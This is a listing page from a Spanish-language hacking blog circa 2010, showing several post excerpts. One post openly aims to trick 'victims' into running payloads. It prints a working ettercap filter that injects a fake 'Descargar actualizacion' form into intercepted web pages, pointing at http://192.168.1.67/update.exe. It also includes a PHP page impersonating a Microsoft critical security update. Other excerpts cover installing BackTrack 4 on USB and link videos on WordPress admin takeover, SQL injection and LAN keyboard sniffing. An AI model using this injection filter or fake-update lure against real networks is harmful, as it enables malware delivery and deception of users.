Publicado el 16/02/2010 12:02:00 en Videos Hacking. Total de votos: 5 Votar
bueno pues aquí le dejo este vídeo de como aprovechar el archivo force-download.php ( o similares ) para obtener acceso al panel de administración, en este caso de word press.
DESCARGAR EL VÍDEO (.avi)Comentarios: 13 | Leer comentarios
Publicado el 26/01/2010 12:01:00 en Hack Avanzado. Total de votos: 1 Votar
Primero que nada, este no es un videotutorial, la intencion es solo de dar ideas de como se puede lograr que las "victimas" descargen y ejecuten nuestros payloads.
cualquier duda de las tecnicas usadas en el video pueden preguntar o buscar en google ( aqui mismo ay varios post ).
DESCARGAR EL VIDEO ( AVI )
filtro utilizado en el video ( cortesia de Pandemic )
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Be-Owned");
}
}
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<title>")) {
replace("</title>", "</title><form
action="http://192.168.1.67/update.exe" method="link"><center><img src="http://192.168.1.67/alert.jpg"><br><br><INPUT TYPE=submit value="Descargar actualizacion"></form><html><body><h1><font color=red>Alerta de seguridad</font></h1></body></html>");
replace("<head>", "<head> <title> Software Upgrade </title> <body><font color=black size=10> Please download the last Active X security upgrade to Continue </font><body text="#ffffff" link="#ffff33" alink="#ffffcc" alink="ffff00"></center> </body> </head>" ");
msg("Filtro activado.\n");
msg("html inyectado exitosamente!!");
}}
Index Utilizado en el video
<?php
$navegador = getenv("HTTP_USER_AGENT");
if (preg_match("/MSIE/i", "$navegador"))
{
echo "<html>
<head>
<META http-equiv='Content-Type' content='text/html; charset=utf-8'>
<style>
body
{
background-image:url('ie-8.jpg');
background-repeat: no-repeat;
background-position:center;
}
</style>
</head>
<body><h2 align='center'><font color='red'>Actualizacion Critica De Seguridad</font></h2><br>
<h3><pre><center><a href='http://www.microsoft.com/spain/technet/security/bulletin/ms10-002.mspx'>MS10-002:</a> trata las vulnerabilidades en Internet Explorer (KB 978207)
Los profesionales de TI y los administradores de sistemas deben consultar <a href='http://www.microsoft.com/spain/technet/security/bulletin/current.mspx'>TechNet</a><br>de Microsoft para obtener información detallada acerca de estas actualizaciones.
</pre></h3>
<h2 align='center'>...
Continúa aquí...Comentarios: 4 | Leer comentarios
Publicado el 19/01/2010 12:01:00 en Linux. Total de votos: 2 Votar
Bueno como el titulo lo indica, este tutorial muestra como instalar BT4 final en una usb con cambios persistentes (para no perder la configuracion,personalisacion,programas instalados,etc).
Para realizar este tutorial me base en
este HOW-TO, y le añadi unas cosas de mi cosecha jeje.
bien empesemos:
primero que nada nesesitamos lo siguiente:
1.- 1 DVD o en su defecto una USB de 2G minimo
2.- 1 USB de 4G minimo ( en esta sera donde quede instalado BT)
3.- UNetbootin ( opcional para hacer un live-USB si no tenemos un DVD )
bien. lo primero que vamos a hacer es bajar BT4 final y quemarlo en nuestro DVD o bien utilizar UNebootin para pasar la imagen al USB de 2G ( para hacer esto podemos seguir
este otro HOW-TO
una ves que tenemos nuestro DVD (o USB) listo iniciamos BT y lo primero que vamos a hacer sera particionar nuetra USB de 4G .
abrimos una consola y ejecutamos el comando
fdisk -l
para ver cual es el nombre de nuestro usb, en mi caso es /dev/sdb
ya que sabemos cual es tecleamos el comando
fdisk /dev/sdb
primero borramos la(s) particiones existentes.
Command (m for help):
d
Partition number (1-4):
1
creamos la primera particion de 1.5G
Command (m for help):
n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4):
1
First cylinder (1-522, default 1):
<enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-522, default 522):
+1500M
ahora creamos la segunda particion en el resto del espacio en la USB
Command (m for help):
n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4):
2
First cylinder (193-522, default 193):
<enter>
Using default value 193
Last cylinder, +cylinders or +size{K,M,G} (193-522, default 522):
<enter>
Using default value 522
Cambiamos el tipo a FAT32 de la primera particion
Command (m for help):
t
Partition number (1-4):
1
Hex code (type L to list codes):
b
Changed system type of partition 1 to b (W95 FAT32)
cambiamos el tipo a LINUX de la segunda particion
Command (m for help):
t
Partition number (1-4):
2
Hex code (type L to list codes):
83
hacemos que la primera particion sea activa
Command (m for help):
a
Partition number (1-4):
1
guardamos los cambios
Command (m for help):
w
ahora vamos a formatear nuestras particiones con los comandos:
mkfs.vfat /dev/sdb1
mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2 (las opciones
-b 40...
Continúa aquí...Comentarios: 1 | Leer comentarios
Publicado el 02/01/2010 12:01:00 en Hacking Web. Total de votos: 1 Votar
bueno pues como el titulo lo dice, este es un pequeño video tutorial de injeccion SQL, espero les guste =)
tambien dejo el enlace de descarga pues en youtube no se aprecia bien.
DESCARGAR VIDEOComentarios: 4 | Leer comentarios
Publicado el 30/11/2009 12:11:00 en Videos Hacking. Total de votos: 4 Votar
aqui les dejo un video en el que muestro como sniffear teclados en una lan utilizando metasploit
DESCARGARComentarios: 7 | Leer comentarios